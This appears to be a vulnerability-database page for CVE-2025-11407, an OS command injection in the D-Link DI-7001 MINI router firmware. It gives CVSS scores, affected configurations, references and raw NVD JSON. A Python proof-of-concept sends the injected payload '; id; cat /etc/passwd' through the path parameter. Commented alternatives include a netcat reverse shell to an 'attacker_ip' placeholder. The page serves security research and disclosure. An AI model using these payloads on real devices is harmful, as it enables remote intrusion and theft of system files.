CVE-2025-11407

Description

A weakness has been identified in D-Link DI-7001 MINI 24.04.18B1. Impacted is an unknown function of the file /upgrade_filter.asp. This manipulation of the argument path causes os command injection. The attack may be initiated remotely. The exploit has been made available to the public and could be exploited.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:o:dlink:di-7001mini-8g_firmware:24.04.18b1:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:dlink:di-7001mini-8g:b1:*:*:*:*:*:*:* - NOT VULNERABLE

D-Link DI-7001 MINI 24.04.18B1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-11407 - D-Link DI-7001 MINI OS Command Injection PoC
# Vulnerability: OS Command Injection via path parameter in /upgrade_filter.asp
# Affected: D-Link DI-7001 MINI firmware 24.04.18B1

import requests
from requests.auth import HTTPBasicAuth

TARGET_URL = "http://target-device-ip"
USERNAME = "admin"  # Low privilege credentials required
PASSWORD = "password"

# Malicious path payload with command injection
# The semicolon terminates the original command and executes our injected command
INJECTION_PAYLOAD = "; id; cat /etc/passwd"

# Step 1: Authenticate to obtain session cookie
session = requests.Session()
login_url = f"{TARGET_URL}/login.asp"
login_data = {
    "username": USERNAME,
    "password": PASSWORD
}
response = session.post(login_url, data=login_data)

# Step 2: Exploit command injection via path parameter
vulnerable_endpoint = f"{TARGET_URL}/upgrade_filter.asp"
params = {
    "path": INJECTION_PAYLOAD
}

response = session.get(vulnerable_endpoint, params=params)
print(f"Status Code: {response.status_code}")
print(f"Response Body:\n{response.text}")

# Alternative payload examples:
# Reverse shell: "; nc -e /bin/sh attacker_ip 4444 #
# Write file: "; echo 'pwned' > /tmp/pwned.txt #
# Read config: "; cat /etc/config/router.conf #

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-11407
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-11407
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-11407/
[4] VulDB https://vuldb.com/cve/CVE-2025-11407
[5] https://github.com/DavCloudz/cve/issues/4
[6] https://vuldb.com/?ctiid.327344
[7] https://vuldb.com/?id.327344
[8] https://vuldb.com/?submit.665471
[9] https://www.dlink.com/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-11407", "sourceIdentifier": "[email protected]", "published": "2025-10-07T20:15:33.400", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in D-Link DI-7001 MINI 24.04.18B1. Impacted is an unknown function of the file /upgrade_filter.asp. This manipulation of the argument path causes os command injection. The attack may be initiated remotely. The exploit has been made available to the public and could be exploited."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-77"}, {"lang": "en", "value": "CWE-78"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dlink:di-7001mini-8g_firmware:24.04.18b1:*:*:*:*:*:*:*", "matchCriteriaId": "98F1181A-9265-4808-9983-8BF8B769D277"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dlink:di-7001mini-8g:b1:*:*:*:*:*:*:*", "matchCriteriaId": "B6AFB9DF-DE81-4481-8D9A-0BA4B76AD606"}]}]}], "references": [{"url": "https://github.com/DavCloudz/cve/issues/4", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.327344", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327344", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.665471", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.dlink.com/", "source": "[email protected]", "tags": ["Product"]}]}}